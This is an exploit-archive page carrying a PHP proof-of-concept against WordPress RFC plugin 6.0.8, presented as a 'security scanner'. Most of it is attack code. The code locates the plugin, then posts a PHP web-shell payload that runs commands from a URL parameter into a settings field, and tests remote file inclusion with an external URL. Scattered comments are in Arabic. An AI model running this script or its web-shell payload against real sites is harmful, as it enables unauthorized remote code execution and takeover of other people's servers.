Share
## https://sploitus.com/exploit?id=PACKETSTORM:216298
=============================================================================================================================================
| # Title : WordPress RFC Plugin 6.0.8 Security Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/179099/
[+] Summary :
The RFC WordPress Plugin version 6.0.8 contains critical security vulnerabilities that allow unauthenticated attackers to execute arbitrary code and include remote files on the target system.
[+] POC :
php poc.php
<?php
class WordPressExploitTester {
private $target;
private $user_agent;
public function __construct($target_url) {
$this->target = rtrim($target_url, '/');
$this->user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36';
}
public function test_plugin_existence() {
$common_paths = [
'/wp-content/plugins/rfc-wordpress/rfc.php',
'/wp-content/plugins/rfc/rfc.php',
'/wp-content/plugins/rfc-wordpress-plugin/rfc.php',
'/wp-content/plugins/rfc-wp/rfc.php'
];
echo "Testing plugin existence...\n";
foreach ($common_paths as $path) {
$url = $this->target . $path;
$exists = $this->check_url_exists($url);
if ($exists) {
echo "✓ Plugin found: $url\n";
return $path;
} else {
echo "✗ Not found: $path\n";
}
}
return false;
}
public function test_rce_vulnerability($plugin_path = null) {
if (!$plugin_path) {
$plugin_path = '/wp-content/plugins/rfc-wordpress/rfc.php';
}
$url = $this->target . $plugin_path;
$payload = "<?php system(\$_GET['cmd']); ?>";
$post_data = array(
'rfc_action' => 'save_settings',
'rfc_settings' => $payload
);
echo "Testing RCE at: $url\n";
return $this->send_post_request($url, $post_data, "RCE");
}
public function test_rfi_vulnerability($plugin_path = null) {
if (!$plugin_path) {
$plugin_path = '/wp-content/plugins/rfc-wordpress/rfc.php';
}
$url = $this->target . $plugin_path . '?rfc_action=save_settings';
$payload = "http://example.com/test.txt";
$post_data = array(
'rfc_settings' => $payload
);
echo "Testing RFI at: $url\n";
return $this->send_post_request($url, $post_data, "RFI");
}
private function check_url_exists($url) {
$ch = curl_init();
curl_setopt_array($ch, array(
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_NOBODY => true, // HEAD request فقط
CURLOPT_TIMEOUT => 5,
CURLOPT_USERAGENT => $this->user_agent,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_SSL_VERIFYPEER => false
));
curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return ($http_code == 200);
}
private function send_post_request($url, $data, $exploit_type) {
$ch = curl_init();
curl_setopt_array($ch, array(
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($data),
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_TIMEOUT => 10,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_USERAGENT => $this->user_agent,
CURLOPT_HEADER => true // للحصول على ال headers
));
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);
curl_close($ch);
echo "HTTP Response Code: $http_code\n";
if ($error) {
return "❌ Error in $exploit_type: " . $error . "\n";
}
if ($http_code == 200) {
return "✅ $exploit_type test completed - Potential vulnerability detected (HTTP 200)\n";
} elseif ($http_code == 404) {
return "❌ $exploit_type test failed - Plugin not found (404)\n";
} elseif ($http_code == 403) {
return "❌ $exploit_type test failed - Access forbidden (403)\n";
} else {
return "⚠️ $exploit_type test - HTTP Code: $http_code (May require further analysis)\n";
}
}
public function full_scan() {
echo "=== WordPress RFC Plugin Security Scanner ===\n";
echo "Target: " . $this->target . "\n\n";
// الخطوة 1: البحث عن المسار الصحيح
$plugin_path = $this->test_plugin_existence();
if (!$plugin_path) {
echo "\n❌ RFC WordPress plugin not found on target.\n";
echo "Possible reasons:\n";
echo "- Plugin not installed\n";
echo "- Different plugin name/path\n";
echo "- Target is not WordPress\n";
echo "- Access restrictions\n";
return;
}
echo "\n✅ Plugin found! Starting vulnerability tests...\n\n";
// الخطوة 2: اختبار الثغرات
$result1 = $this->test_rce_vulnerability($plugin_path);
echo $result1 . "\n";
$result2 = $this->test_rfi_vulnerability($plugin_path);
echo $result2 . "\n";
echo "\n=== Scan Complete ===\n";
}
}
// الاستخدام
if ($argc > 1) {
$target = $argv[1];
} else {
$target = "https://target.com"; // غير هذا بالهدف الحقيقي
}
echo "WordPress RFC Plugin Security Scanner\n";
echo "=====================================\n\n";
$tester = new WordPressExploitTester($target);
$tester->full_scan();
// استخدام بديل إذا أردت اختبار موقع محلي
class LocalTest {
public static function test_local_setup() {
echo "\n=== Local Test Mode ===\n";
$test_urls = [
'http://localhost/wordpress',
'http://127.0.0.1/wordpress',
'http://localhost:8080',
'http://test.local'
];
foreach ($test_urls as $test_url) {
echo "Testing: $test_url\n";
$tester = new WordPressExploitTester($test_url);
$tester->test_plugin_existence();
echo "---\n";
}
}
}
// لتفعيل الاختبار المحلي، أزل التعليق من السطر التالي:
// LocalTest::test_local_setup();
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================